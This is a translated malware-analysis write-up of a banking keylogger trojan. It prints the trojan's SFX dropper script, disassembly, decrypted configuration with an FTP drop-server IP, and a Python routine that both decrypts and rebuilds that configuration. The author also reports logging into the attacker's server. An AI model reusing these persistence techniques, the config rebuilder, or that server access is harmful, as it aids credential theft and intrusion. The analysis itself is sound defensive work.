[Title]: A Quick Analysis of a Bank-Account-Stealing Trojan
[Author]: CCDebuger
[Download]: search for it yourself
[Author's note]: Just out of interest, no other purpose. Corrections from the experts are welcome!
--------------------------------------------------------------------------------
[Detailed analysis]
Checking my mailbox today I found a spam mail from 刘娜 (Liu Na) <mnbppp@163.com> with this content:
Hello, I saw the product information your company posted on the Internet.
May I ask what the price of this kind is, and can it be mail-ordered? Thanks for replying.
It carries an attachment "图片.rar" ("picture.rar") that looked suspicious at a glance. Downloading and unpacking "图片.rar" yields a "图片.exe" whose icon is Explorer's picture icon; it is a RAR self-extracting archive with the following SFX script:
;The comment below contains SFX script commands
Path=%systemroot%\temp
SavePath
Setup=book.exe
Presetup=1.jpg
Silent=1
Overwrite=2
The script extracts silently (Silent=1, Overwrite=2) to %systemroot%\temp, uses 1.jpg as the decoy image and runs book.exe. Extract it directly with WinRAR and look at book.exe. I don't know which packer it uses; while unpacking I saw several layers, all compression packers, so I unpacked them with the ESP trick. The unpacked file is a Delphi program. Looking at its resources, there is an INFO entry under RCDATA, which should be the encrypted configuration. A first pass in IDA shows the program is fairly straightforward: it decodes the configuration, copies itself to the system directory and runs the copy, sets some registry entries, then monitors the keyboard:
CODE:00433FC0 public start
CODE:00433FC0 start:
CODE:00433FC0 push ebp
CODE:00433FC1 mov ebp, esp
CODE:00433FC3 mov ecx, 6
CODE:00433FC3
CODE:00433FC8
CODE:00433FC8 loc_433FC8: ; CODE XREF: CODE:00433FCDj
CODE:00433FC8 push 0
CODE:00433FCA push 0
CODE:00433FCC dec ecx
CODE:00433FCD jnz short loc_433FC8
CODE:00433FCD
CODE:00433FCF push ecx
CODE:00433FD0 push ebx
CODE:00433FD1 push esi
CODE:00433FD2 mov eax, offset dword_433EF0
CODE:00433FD7 call Sysinit::__linkproc__ InitExe(void *)
CODE:00433FD7
CODE:00433FDC mov esi, offset unk_437A4C
CODE:00433FE1 xor eax, eax
CODE:00433FE3 push ebp
CODE:00433FE4 push offset loc_4341B0
CODE:00433FE9 push dword ptr fs:[eax]
CODE:00433FEC mov fs:[eax], esp
CODE:00433FEF lea edx, [ebp-14h]
CODE:00433FF2 mov eax, 1
CODE:00433FF7 call System::ParamStr(int)
CODE:00433FF7
CODE:00433FFC mov eax, [ebp-14h]
CODE:00433FFF mov edx, offset s->Lanzateactivex ; "/lanzateActiveX"
CODE:00434004 call System::__linkproc__ LStrCmp(void)
CODE:00434004
CODE:00434009 jnz short loc_43403C
CODE:00434009
CODE:0043400B push 0
CODE:0043400D push offset dword_4341D8
CODE:00434012 push offset s->Reactivateactivex_0 ; "/reactivateActiveX"
CODE:00434017 lea edx, [ebp-18h]
CODE:0043401A xor eax, eax
CODE:0043401C call System::ParamStr(int)
CODE:0043401C
CODE:00434021 mov eax, [ebp-18h]
CODE:00434024 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434024
CODE:00434029 push eax
CODE:0043402A push 0
CODE:0043402C mov eax, ds:hInstance
CODE:00434031 push eax
CODE:00434032 call ShellExecuteA
CODE:00434032
CODE:00434037 call System::__linkproc__ Halt0(void)
CODE:00434037
CODE:0043403C ; ---------------------------------------------------------------------------
CODE:0043403C
CODE:0043403C loc_43403C: ; CODE XREF: CODE:00434009j
CODE:0043403C lea edx, [ebp-1Ch]
CODE:0043403F mov eax, 1
CODE:00434044 call System::ParamStr(int)
CODE:00434044
CODE:00434049 mov eax, [ebp-1Ch]
CODE:0043404C mov edx, offset s->Lanzaterunonce_0 ; "/lanzateRunOnce"
CODE:00434051 call System::__linkproc__ LStrCmp(void)
CODE:00434051
CODE:00434056 jnz short loc_434089
CODE:00434056
CODE:00434058 push 0
CODE:0043405A push offset dword_4341D8
CODE:0043405F push offset s->Reactivaterunonce_0 ; "/reactivateRunOnce"
CODE:00434064 lea edx, [ebp-20h]
CODE:00434067 xor eax, eax
CODE:00434069 call System::ParamStr(int)
CODE:00434069
CODE:0043406E mov eax, [ebp-20h]
CODE:00434071 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434071
CODE:00434076 push eax
CODE:00434077 push 0
CODE:00434079 mov eax, ds:hInstance
CODE:0043407E push eax
CODE:0043407F call ShellExecuteA
CODE:0043407F
CODE:00434084 call System::__linkproc__ Halt0(void)
CODE:00434084
CODE:00434089 ; ---------------------------------------------------------------------------
CODE:00434089
CODE:00434089 loc_434089: ; CODE XREF: CODE:00434056j
CODE:00434089 lea edx, [ebp-24h]
CODE:0043408C mov eax, 1
CODE:00434091 call System::ParamStr(int)
CODE:00434091
CODE:00434096 mov eax, [ebp-24h]
CODE:00434099 mov edx, offset s->Instalando ; "/instalando"
CODE:0043409E call System::__linkproc__ LStrCmp(void)
CODE:0043409E
CODE:004340A3 jz short loc_4340DD
CODE:004340A3
CODE:004340A5 lea edx, [ebp-28h]
CODE:004340A8 mov eax, 1
CODE:004340AD call System::ParamStr(int)
CODE:004340AD
CODE:004340B2 mov eax, [ebp-28h]
CODE:004340B5 mov edx, offset s->Reactivateactivex_1 ; "/reactivateActiveX"
CODE:004340BA call System::__linkproc__ LStrCmp(void)
CODE:004340BA
CODE:004340BF jz short loc_4340DD
CODE:004340BF
CODE:004340C1 lea edx, [ebp-2Ch]
CODE:004340C4 mov eax, 1
CODE:004340C9 call System::ParamStr(int)
CODE:004340C9
CODE:004340CE mov eax, [ebp-2Ch]
CODE:004340D1 mov edx, offset s->Reactivaterunonce_1 ; "/reactivateRunOnce"
CODE:004340D6 call System::__linkproc__ LStrCmp(void)
CODE:004340D6
CODE:004340DB jnz short loc_43411B
CODE:004340DB
CODE:004340DD
CODE:004340DD loc_4340DD: ; CODE XREF: CODE:004340A3j
CODE:004340DD ; CODE:004340BFj
CODE:004340DD lea edx, [ebp-30h]
CODE:004340E0 mov eax, 2
CODE:004340E5 call System::ParamStr(int)
CODE:004340E5
CODE:004340EA mov eax, [ebp-30h]
CODE:004340ED mov edx, offset s->Melt ; "/melt"
CODE:004340F2 call System::__linkproc__ LStrCmp(void)
CODE:004340F2
CODE:004340F7 jnz short loc_43411B
CODE:004340F7
CODE:004340F9 jmp short loc_434102
CODE:004340F9
CODE:004340FB ; ---------------------------------------------------------------------------
CODE:004340FB
CODE:004340FB loc_4340FB: ; CODE XREF: CODE:00434119j
CODE:004340FB push 64h
CODE:004340FD call Sleep
CODE:004340FD
CODE:00434102
CODE:00434102 loc_434102: ; CODE XREF: CODE:004340F9j
CODE:00434102 lea edx, [ebp-34h]
CODE:00434105 mov eax, 3
CODE:0043410A call System::ParamStr(int)
CODE:0043410A
CODE:0043410F mov eax, [ebp-34h]
CODE:00434112 call Sysutils::DeleteFile(System::AnsiString)
CODE:00434112
CODE:00434117 test al, al
CODE:00434119 jz short loc_4340FB
CODE:00434119
CODE:0043411B
CODE:0043411B loc_43411B: ; CODE XREF: CODE:004340DBj
CODE:0043411B ; CODE:004340F7j
CODE:0043411B push offset s->Ik0_1Abcd ; "IK 0.1 abcd"
CODE:00434120 push 0FFFFFFFFh
CODE:00434122 push 0
CODE:00434124 call _Create_Mutex ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00434124
CODE:00434129 mov ebx, eax
CODE:0043412B call GetLastError
CODE:0043412B
CODE:00434130 cmp eax, ERROR_ALREADY_EXISTS
CODE:00434135 jnz short loc_43413C
CODE:00434135
CODE:00434137 call System::__linkproc__ Halt0(void)
CODE:00434137
CODE:0043413C ; ---------------------------------------------------------------------------
CODE:0043413C
CODE:0043413C loc_43413C: ; CODE XREF: CODE:00434135j
CODE:0043413C call _Read_INFO ; read the INFO entry in RCDATA and decode it
CODE:0043413C
CODE:00434141 call _Copy_and_Run ; copy itself to the system directory and run the copy
CODE:00434141
CODE:00434146 call _Set_Reg_Info ; set registry entries and, depending on the config, create a pschost directory under the system directory,
CODE:00434146 ; copy the trojan there and set the registry entries
CODE:00434146
CODE:0043414B call _Get_KeyBoard ; monitor keyboard input
----------------------------------------------------------------------------------------------------------
1. Decoding the configuration file
What interested me most about this trojan is its configuration, so let's look at the config-decoding part. First, the raw data of the INFO resource in the program (hex bytes; only the leading "5628@@@" is printable):
0000h: 35 36 32 38 40 40 40 24 30 79 B9 45 04 BE C4 59
0010h: 65 36 E1 2B DC 34 46 CF CB 28 DB EA 80 D9 93 38
0020h: 55 49 B6 97 F8 19 B8 0A 02 2F 39 CE 2B AB C7 3C
0030h: 61 39 84 8F 35 1C 7E F5 57 60 A4 B4 C2 0C 75 92
0040h: 71 6A 9F 54 1E 76 21 A0 7F 43 FC A0 B6 07 B6 DD
0050h: D7 F9 A5 1D 4D 19 25 61 49 C6 14 02 52 FD 60 A3
0060h: 8A 3C ED 90 FF 0F 0D D7 03 EB E7 98 48 16 1A B6
0070h: 28 12 7C BB 9B AB 70 87 28 73 B5 3B 92 81 BE 7D
0080h: DF 86 BA 7F F8 40 9F FA 9D BB 17 87 98 E6 2C D5
0090h: 28 94 F1 4B 21 39 72 BC E9 99 F6 AE ED 4F C5 DB
00A0h: 41 C8 A0 55 2A D9 BD 0D 16 04 0A 13 8F 0F 36 AC
00B0h: F8 99 E4 FD F7 62 5D 21 4E CF B1 B3 4E D9 0F 7E
00C0h: 69 D6 D5 82 42 ED C6 A7 A5 FF 23 CD 49 5E ED 42
00D0h: 29 98 DE B6 F4 E6 D8 36 9B 22 A5 5B 63 81 50 9C
00E0h: 5E 7C 2D 15 49 0A 17 3B 4C C4 F1 BB DA 78 61 4B
00F0h: 57 20 50 95 4C 06 8C 0F EC ED 50 FA F0 61 9C 88
0100h: 24 73 05 15 CE 26 DA E6 AD BF A4 94 6F 8E 95 29
0110h: 2C 1A A1 01 DD 8C F5 C7 4D 21 16 C7 EC 8C C7 56
0120h: 83 58 92 42 D7 10 30 8C FA F5 60 06 41 50 3D 4C
0130h: A2 4B FF 15 C4 11 DA E5 0E EC 4C 6E 6D B6 F7 B2
0140h: EE D5 DB 46 26 F7 52 DC 31 ED 64 61 B2 AF B3 80
0150h: CA 81 EB 95 D0 2E 34 ED AF F1 94 DC E4 06 31 82
0160h: 6F 47 55 78 30 7D 50 6E FA 4B 8B 99 39 75 9B 76
0170h: AA 7A B0 58 8A 45 E3 01 B3 06 B7 20 30 28 87 CE
0180h: 28 33 5E 20 1C 9A 15 FB B8 B1 A1 38 5E 18 0D C7
0190h: 66 B2 3D 57 CE D3 3D 3C 68 B7 99 5D F3 8D F8 2F
01A0h: D2 41 AC 71 FD 1B 88 3B 9E 6F D4 E7 C2 E6 13 7A
01B0h: 75 41 03 F2 7F 69 76 89 60 D8 B5 BD EC EF BA 07
01C0h: BE 42 77 B2 95 EB 74 8C BC A6 3B 40 18 29 4E 4D
01D0h: D1 C2 2E EE D9 92 09 69 2C C4 CE FE 3F 29 FB 38
01E0h: 04 6C 75 6E 4D 8C D3 7C E7 95 17 1D 93 21 2B 7B
01F0h: C5 62 00
Now the code that decodes the configuration:
CODE:00433990 _Read_INFO proc near ; CODE XREF: CODE:loc_43413Cp
CODE:00433990
CODE:00433990 var_18 = dword ptr -18h
CODE:00433990 var_14 = dword ptr -14h
CODE:00433990 var_10 = dword ptr -10h
CODE:00433990 var_C = dword ptr -0Ch
CODE:00433990 var_8 = dword ptr -8
CODE:00433990 var_4 = dword ptr -4
CODE:00433990
CODE:00433990 push ebp
CODE:00433991 mov ebp, esp
CODE:00433993 xor ecx, ecx
CODE:00433995 push ecx
CODE:00433996 push ecx
CODE:00433997 push ecx
CODE:00433998 push ecx
CODE:00433999 push ecx
CODE:0043399A push ecx
CODE:0043399B push ebx
CODE:0043399C push esi
CODE:0043399D push edi
CODE:0043399E xor eax, eax
CODE:004339A0 push ebp
CODE:004339A1 push offset loc_433E8E
CODE:004339A6 push dword ptr fs:[eax]
CODE:004339A9 mov fs:[eax], esp
CODE:004339AC push 0Ah ; lpType
CODE:004339AE push offset s->Info ; "INFO"
CODE:004339B3 mov eax, ds:hInstance
CODE:004339B8 push eax ; hModule
CODE:004339B9 call FindResourceA
CODE:004339B9
CODE:004339BE mov ebx, eax
CODE:004339C0 push ebx ; hResInfo
CODE:004339C1 mov eax, ds:hInstance
CODE:004339C6 push eax ; hModule
CODE:004339C7 call SizeofResource
CODE:004339C7
CODE:004339CC mov esi, eax
CODE:004339CE push ebx ; hResInfo
CODE:004339CF mov eax, ds:hInstance
CODE:004339D4 push eax ; hModule
CODE:004339D5 call LoadResource
CODE:004339D5
CODE:004339DA mov ebx, eax
CODE:004339DC push ebx ; hResData
CODE:004339DD call LockResource
CODE:004339DD
CODE:004339E2 mov edi, eax
CODE:004339E4 test edi, edi
CODE:004339E6 jnz short loc_4339ED
CODE:004339E6
CODE:004339E8 call System::__linkproc__ Halt0(void)
CODE:004339E8
CODE:004339ED ; ---------------------------------------------------------------------------
CODE:004339ED
CODE:004339ED loc_4339ED: ; CODE XREF: _Read_INFO+56j
CODE:004339ED mov edx, esi
CODE:004339EF dec edx
CODE:004339F0 lea eax, [ebp+var_4]
CODE:004339F3 call System::__linkproc__ LStrSetLength(void)
CODE:004339F3
CODE:004339F8 lea eax, [ebp+var_4]
CODE:004339FB call j_unknown_libname_64
CODE:004339FB
CODE:00433A00 mov ecx, esi
CODE:00433A02 mov edx, edi
CODE:00433A04 call _Move_Data
CODE:00433A04
CODE:00433A09 push ebx ; hResData
CODE:00433A0A call FreeResource
CODE:00433A0A
CODE:00433A0F lea eax, [ebp+var_C]
CODE:00433A12 push eax
CODE:00433A13 mov edx, [ebp+var_4]
CODE:00433A16 mov eax, offset off_433EAC
CODE:00433A1B call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A1B
CODE:00433A20 mov ecx, eax
CODE:00433A22 dec ecx
CODE:00433A23 mov edx, 1
CODE:00433A28 mov eax, [ebp+var_4]
CODE:00433A2B call System::__linkproc__ LStrCopy(void)
CODE:00433A2B
CODE:00433A30 mov eax, [ebp+var_C]
CODE:00433A33 call Sysutils::StrToInt(System::AnsiString)
CODE:00433A33
CODE:00433A38 mov ebx, eax
CODE:00433A3A lea eax, [ebp+var_4]
CODE:00433A3D push eax
CODE:00433A3E mov edx, [ebp+var_4]
CODE:00433A41 mov eax, offset off_433EAC
CODE:00433A46 call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A46
CODE:00433A4B push eax
CODE:00433A4C mov eax, [ebp+var_4]
CODE:00433A4F call _Get_StrLen
CODE:00433A4F
CODE:00433A54 pop edx
CODE:00433A55 sub eax, edx
CODE:00433A57 add eax, 3
CODE:00433A5A push eax
CODE:00433A5B mov edx, [ebp+var_4]
CODE:00433A5E mov eax, offset off_433EAC
CODE:00433A63 call _Cmp_Str_by_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A63
CODE:00433A68 mov edx, eax
CODE:00433A6A add edx, 3
CODE:00433A6D mov eax, [ebp+var_4]
CODE:00433A70 pop ecx
CODE:00433A71 call System::__linkproc__ LStrCopy(void)
CODE:00433A71
CODE:00433A76 lea ecx, [ebp+var_10]
CODE:00433A79 mov edx, ebx
CODE:00433A7B mov eax, [ebp+var_4]
CODE:00433A7E call _Decrypt_INFO ; this is where the INFO data is decoded
CODE:00433A7E
CODE:00433A83 mov edx, [ebp+var_10] ; address of the decoded INFO resource goes into EDX
CODE:00433A86 lea eax, [ebp+var_4]
CODE:00433A89 call System::__linkproc__ LStrLAsg(void *,void *)
CODE:00433A89
CODE:00433A8E mov ebx, 1
CODE:00433A8E
CODE:00433A93
CODE:00433A93 loc_433A93: ; CODE XREF: _Read_INFO+4DDj
----------------------------------------------------------------------------------------------------------
The decoding algorithm:
CODE:00414834 loc_414834: ; CODE XREF: _Decrypt_INFO+69j
CODE:00414834 mov eax, [esp+18h+var_18]
CODE:00414837 call _Read_Str
CODE:00414837
CODE:0041483C movzx edi, bx ; the block below is the decoding algorithm
CODE:0041483F mov dl, [ebp+edi-1]
CODE:00414843 movzx ecx, si
CODE:00414846 shr ecx, 8
CODE:00414849 xor dl, cl
CODE:0041484B mov [eax+edi-1], dl
CODE:0041484F xor eax, eax
CODE:00414851 mov al, [ebp+edi-1]
CODE:00414855 add si, ax
CODE:00414858 imul ax, si, 0BC17h
CODE:0041485D add ax, 0F386h
CODE:00414861 mov esi, eax
CODE:00414863 inc ebx
CODE:00414864 dec [esp+18h+var_14]
CODE:00414869 jnz short loc_414834
Let the program decode the encrypted configuration for us by running it in OD. The leading "5628" before the "@@@" separator is not itself decoded: _Read_INFO splits it off, converts it with StrToInt and passes it in EDX to _Decrypt_INFO, where it seeds the 16-bit state kept in SI (decoding the first ciphertext bytes 24 30 79 B9 45 with seed 5628 yields "1@@@1", so the decoded fields are again separated by "@@@"). Tidied up, one field per line, the result is as follows (FTP user name and password masked for safety; the text after // is my comment):
1
125.64.24.60 //FTP server IP address
2** //FTP user name?
1** //FTP password?
21 //FTP port
/IKLogs/%UserName%/
0
0
0
1
%Windir%\RSTray.exe //trojan file created in the system's Windows directory
1
010000
svchost //name of the autorun entry set in the registry
SCISound
{4fz8rk-15aq-16nc-23or4-2ke0fa051515}
pschost
1
中国建设银行|||广东发展银行|||中国民生银行|||中国邮政支付网关|||网付通支付网关|||广州市商业银行|||顺德信用社|||信社e-bank|||兴业银行|||深圳平安银行|||在线兴业|||平安个人网上银行|||宁波银行|||信用合作联社|||支付页面|||客户交易结果信息显示|||
1000
800
50
1
SOFTWARE\Microsoft\Cryptography\RNG\
1
Judging by what came out above, this is a bank-account-stealing trojan, probably related to the IKlogger software. I connected with the FTP address, user name and password obtained: there is an iklogs directory, with one subdirectory per monitored machine's user name; each user-name directory contains clickshots and logs directories, and the text files under logs, named by time, are the keystroke logs.
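The decoding loop above is small enough to re-implement, which is handy when more samples with the same INFO layout turn up. The following is an added example written for this page, not code from the original write-up or from the sample: it reproduces the _Decrypt_INFO loop in Python (16-bit LCG state, multiplier 0BC17h, increment 0F386h, high byte XORed into each ciphertext byte, ciphertext byte fed back into the state), splits the resource the way _Read_INFO does (the decimal number before the first "@@@" is the seed, everything after it is the ciphertext, and the trailing NUL is dropped as SetLength(size-1) does), and checks itself against the first ciphertext bytes of the INFO dump above. The names `decrypt`, `encrypt`, `parse_info` and `build_info` are mine.

```python
from __future__ import annotations

# Constants recovered from the disassembly at CODE:00414834-00414869.
LCG_MUL = 0xBC17          # imul ax, si, 0BC17h
LCG_ADD = 0xF386          # add  ax, 0F386h
SEPARATOR = b"@@@"        # splits seed from ciphertext, and field from field


def _next_state(state: int, cipher_byte: int) -> int:
    """add si, ax ; imul ax, si, 0BC17h ; add ax, 0F386h  (16-bit arithmetic)."""
    state = (state + cipher_byte) & 0xFFFF
    return (state * LCG_MUL + LCG_ADD) & 0xFFFF


def decrypt(ciphertext: bytes, seed: int) -> bytes:
    """XOR each byte with the high byte of the state; the feedback byte is the
    *ciphertext* byte (mov al, [ebp+edi-1] re-reads the source buffer)."""
    state = seed & 0xFFFF
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ (state >> 8))       # shr ecx, 8 ; xor dl, cl
        state = _next_state(state, c)
    return bytes(out)


def encrypt(plaintext: bytes, seed: int) -> bytes:
    """Inverse of decrypt(): the state update uses the ciphertext byte just produced."""
    state = seed & 0xFFFF
    out = bytearray()
    for p in plaintext:
        c = p ^ (state >> 8)
        out.append(c)
        state = _next_state(state, c)
    return bytes(out)


def parse_info(blob: bytes) -> list[bytes]:
    """Mirror _Read_INFO: '<decimal seed>@@@<ciphertext>[\\0]' -> list of fields."""
    if blob.endswith(b"\x00"):             # resource ends in NUL; SetLength(size-1) drops it
        blob = blob[:-1]
    pos = blob.find(SEPARATOR)
    if pos < 0:
        raise ValueError("no @@@ separator in INFO resource")
    seed = int(blob[:pos].decode("ascii"))  # StrToInt(Copy(s, 1, pos-1))
    plain = decrypt(blob[pos + len(SEPARATOR):], seed)
    return plain.split(SEPARATOR)


def build_info(fields: list[bytes], seed: int) -> bytes:
    """Build a blob in the same layout, e.g. to round-trip a modified config."""
    body = encrypt(SEPARATOR.join(fields), seed)
    return str(seed).encode("ascii") + SEPARATOR + body + b"\x00"


# First seven ciphertext bytes of the INFO resource shown above (offset 0x07),
# seeded with the leading "5628". They decode to b"1@@@125": the field "1",
# a separator, then the start of "125.64.24.60".
INFO_PREFIX = bytes.fromhex("24 30 79 B9 45 04 BE")
INFO_SEED = 5628

if __name__ == "__main__":
    print(decrypt(INFO_PREFIX, INFO_SEED))   # b'1@@@125'
```

To decode a whole sample, dump the INFO resource (e.g. with Resource Hacker) and pass the raw bytes to parse_info(); the seed differs per build, which is why it is carried in the clear in front of the separator.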
----------------------------------------------------------------------------------------------------------
2. Copying itself and running
CODE:004332C4 _Copy_and_Run proc near ; CODE XREF: CODE:00434141p
CODE:004332C4
CODE:004332C4 var_1C = dword ptr -1Ch
CODE:004332C4 var_18 = dword ptr -18h
CODE:004332C4 var_14 = dword ptr -14h
CODE:004332C4 var_10 = dword ptr -10h
CODE:004332C4 var_C = dword ptr -0Ch
CODE:004332C4 var_8 = dword ptr -8
CODE:004332C4 var_4 = dword ptr -4
CODE:004332C4
CODE:004332C4 push ebp
CODE:004332C5 mov ebp, esp
CODE:004332C7 xor ecx, ecx
CODE:004332C9 push ecx
CODE:004332CA push ecx
CODE:004332CB push ecx
CODE:004332CC push ecx
CODE:004332CD push ecx
CODE:004332CE push ecx
CODE:004332CF push ecx
CODE:004332D0 xor eax, eax
CODE:004332D2 push ebp
CODE:004332D3 push offset loc_43340F
CODE:004332D8 push dword ptr fs:[eax]
CODE:004332DB mov fs:[eax], esp
CODE:004332DE lea edx, [ebp+var_4]
CODE:004332E1 mov eax, ds:off_4361BC
CODE:004332E6 mov eax, [eax]
CODE:004332E8 call _Envionment_Var_To_Real_Value ; expand the environment variables into the real system path
CODE:004332E8
CODE:004332ED mov edx, [ebp+var_4]
CODE:004332F0 mov eax, ds:off_4361BC
CODE:004332F5 call System::__linkproc__ LStrAsg(void *,void *)
CODE:004332F5
CODE:004332FA lea edx, [ebp+var_8]
CODE:004332FD mov eax, ds:off_4360FC
CODE:00433302 mov eax, [eax]
CODE:00433304 call _Envionment_Var_To_Real_Value
CODE:00433304
CODE:00433309 mov edx, [ebp+var_8]
CODE:0043330C mov eax, ds:off_4360FC
CODE:00433311 call System::__linkproc__ LStrAsg(void *,void *)
CODE:00433311
CODE:00433316 lea edx, [ebp+var_C]
CODE:00433319 xor eax, eax
CODE:0043331B call System::ParamStr(int)
CODE:0043331B
CODE:00433320 mov eax, [ebp+var_C]
CODE:00433323 mov edx, ds:off_4361BC
CODE:00433329 mov edx, [edx]
CODE:0043332B call System::__linkproc__ LStrCmp(void)
CODE:0043332B
CODE:00433330 jz loc_4333F4
CODE:00433330
CODE:00433336 push 0 ; bFailIfExists
CODE:00433338 mov eax, ds:off_4361BC
CODE:0043333D mov eax, [eax]
CODE:0043333F call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:0043333F
CODE:00433344 push eax ; lpNewFileName
CODE:00433345 lea edx, [ebp+var_10]
CODE:00433348 xor eax, eax
CODE:0043334A call System::ParamStr(int)
CODE:0043334A
CODE:0043334F mov eax, [ebp+var_10]
CODE:00433352 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433352
CODE:00433357 push eax ; lpExistingFileName
CODE:00433358 call CopyFileA ; copy the trojan into the Windows directory, renamed to RSTray.exe per the decoded config
CODE:00433358
CODE:0043335D mov eax, ds:off_436188
CODE:00433362 cmp byte ptr [eax], 1
CODE:00433365 jnz short loc_4333C9
CODE:00433365
CODE:00433367 push 0 ; nShowCmd
CODE:00433369 push offset Directory ; lpDirectory
CODE:0043336E push offset s->InstalandoMelt ; "/instalando /melt \""
CODE:00433373 lea edx, [ebp+var_1C]
CODE:00433376 xor eax, eax
CODE:00433378 call System::ParamStr(int)
CODE:00433378
CODE:0043337D mov eax, [ebp+var_1C]
CODE:00433380 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433380
CODE:00433385 mov edx, eax
CODE:00433387 lea eax, [ebp+var_18]
CODE:0043338A call _Get_String_Len ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043338A
CODE:0043338F push [ebp+var_18]
CODE:00433392 push offset dword_433444
CODE:00433397 lea eax, [ebp+var_14]
CODE:0043339A mov edx, 3
CODE:0043339F call System::__linkproc__ LStrCatN(void)
CODE:0043339F
CODE:004333A4 mov eax, [ebp+var_14]
CODE:004333A7 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333A7
CODE:004333AC push eax ; lpParameters
CODE:004333AD mov eax, ds:off_4361BC
CODE:004333B2 mov eax, [eax]
CODE:004333B4 call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333B4
CODE:004333B9 push eax ; lpFile
CODE:004333BA push 0 ; lpOperation
CODE:004333BC mov eax, ds:hInstance
CODE:004333C1 push eax ; hwnd
CODE:004333C2 call ShellExecuteA ; run the trojan with the /instalando /melt parameters built above
CODE:004333C2
CODE:004333C7 jmp short loc_4333EF
CODE:004333C7
CODE:004333C9 ; ---------------------------------------------------------------------------
CODE:004333C9
CODE:004333C9 loc_4333C9: ; CODE XREF: _Copy_and_Run+A1j
CODE:004333C9 push 0 ; nShowCmd
CODE:004333CB push offset Directory ; lpDirectory
CODE:004333D0 push offset Parameters ; "/instalando"
CODE:004333D5 mov eax, ds:off_4361BC
CODE:004333DA mov eax, [eax]
CODE:004333DC call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333DC
CODE:004333E1 push eax ; lpFile
CODE:004333E2 push 0 ; lpOperation
CODE:004333E4 mov eax, ds:hInstance
CODE:004333E9 push eax ; hwnd
CODE:004333EA call ShellExecuteA
CODE:004333EA
CODE:004333EF
CODE:004333EF loc_4333EF: ; CODE XREF: _Copy_and_Run+103j
CODE:004333EF call System::__linkproc__ Halt0(void)
CODE:004333EF
CODE:004333F4 ; ---------------------------------------------------------------------------
CODE:004333F4
CODE:004333F4 loc_4333F4: ; CODE XREF: _Copy_and_Run+6Cj
CODE:004333F4 xor eax, eax
CODE:004333F6 pop edx
CODE:004333F7 pop ecx
CODE:004333F8 pop ecx
CODE:004333F9 mov fs:[eax], edx
CODE:004333FC push offset loc_433416
CODE:004333FC
CODE:00433401
CODE:00433401 loc_433401: ; CODE XREF: _Copy_and_Run+150j
CODE:00433401 lea eax, [ebp+var_1C]
CODE:00433404 mov edx, 7
CODE:00433409 call System::__linkproc__ LStrArrayClr(void *,int)
CODE:00433409
CODE:0043340E retn
CODE:0043340E
CODE:0043340F ; ---------------------------------------------------------------------------
CODE:0043340F
CODE:0043340F loc_43340F: ; DATA XREF: _Copy_and_Run+Fo
CODE:0043340F jmp unknown_libname_48 ; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043340F
CODE:00433414 ; ---------------------------------------------------------------------------
CODE:00433414 jmp short loc_433401
CODE:00433414
CODE:00433416 ; ---------------------------------------------------------------------------
CODE:00433416
CODE:00433416 loc_433416: ; CODE XREF: _Copy_and_Run+14Aj
CODE:00433416 ; DATA XREF: _Copy_and_Run+138o
CODE:00433416 mov esp, ebp
CODE:00433418 pop ebp
CODE:00433419 retn
CODE:00433419
CODE:00433419 _Copy_and_Run endp
Above is the self-copy code; I won't go through it in detail, only the result:
The trojan copies itself into the system's Windows directory as RSTray.exe and runs that copy with the parameters /instalando /melt. From the start-up code shown earlier, /melt makes the new copy delete the original file passed as its third parameter (the quoted ParamStr(0) of the dropper), retrying DeleteFile after Sleep(64h), i.e. every 100 ms, until the original has exited and the delete succeeds.
----------------------------------------------------------------------------------------------------------
3. Registry settings
CODE:0043375C _Set_Reg_Info proc near ; CODE XREF: CODE:00434146p
CODE:0043375C
CODE:0043375C var_14 = dword ptr -14h
CODE:0043375C var_10 = dword ptr -10h
CODE:0043375C var_C = dword ptr -0Ch
CODE:0043375C var_8 = dword ptr -8
CODE:0043375C var_4 = dword ptr -4
CODE:0043375C
CODE:0043375C push ebp
CODE:0043375D mov ebp, esp
CODE:0043375F xor ecx, ecx
CODE:00433761 push ecx
CODE:00433762 push ecx
CODE:00433763 push ecx
CODE:00433764 push ecx
CODE:00433765 push ecx
CODE:00433766 push ebx
CODE:00433767 mov ebx, ds:off_436284
CODE:0043376D xor eax, eax
CODE:0043376F push ebp
CODE:00433770 push offset loc_43388C
CODE:00433775 push dword ptr fs:[eax]
CODE:00433778 mov fs:[eax], esp
CODE:0043377B lea edx, [ebp+var_4]
CODE:0043377E mov eax, 1
CODE:00433783 call System::ParamStr(int)
CODE:00433783
CODE:00433788 mov eax, [ebp+var_4]
CODE:0043378B mov edx, offset s->Reactivateactivex ; "/reactivateActiveX"
CODE:00433790 call System::__linkproc__ LStrCmp(void)
CODE:00433790
CODE:00433795 jnz short loc_4337B9
CODE:00433795
CODE:00433797 mov ecx, ds:off_4360F0
CODE:0043379D mov ecx, [ecx]
CODE:0043379F lea eax, [ebp+var_8]
CODE:004337A2 mov edx, offset s->SoftwareMicrosoftActiveSetupInstalledComponents_0 ; "SOFTWARE\\Microsoft\\Active Setup\\Install"...
CODE:004337A7 call System::__linkproc__ LStrCat3(void)
CODE:004337A7
CODE:004337AC mov edx, [ebp+var_8]
CODE:004337AF mov eax, HKEY_CURRENT_USER
CODE:004337B4 call _Delete_RegKey
CODE:004337B4
CODE:004337B9
CODE:004337B9 loc_4337B9: ; CODE XREF: _Set_Reg_Info+39j
CODE:004337B9 lea edx, [ebp+var_C]
CODE:004337BC mov eax, 1
CODE:004337C1 call System::ParamStr(int)
CODE:004337C1
CODE:004337C6 mov eax, [ebp+var_C]
CODE:004337C9 mov edx, offset s->Reactivaterunonce ; "/reactivateRunOnce"
CODE:004337CE call System::__linkproc__ LStrCmp(void)
CODE:004337CE
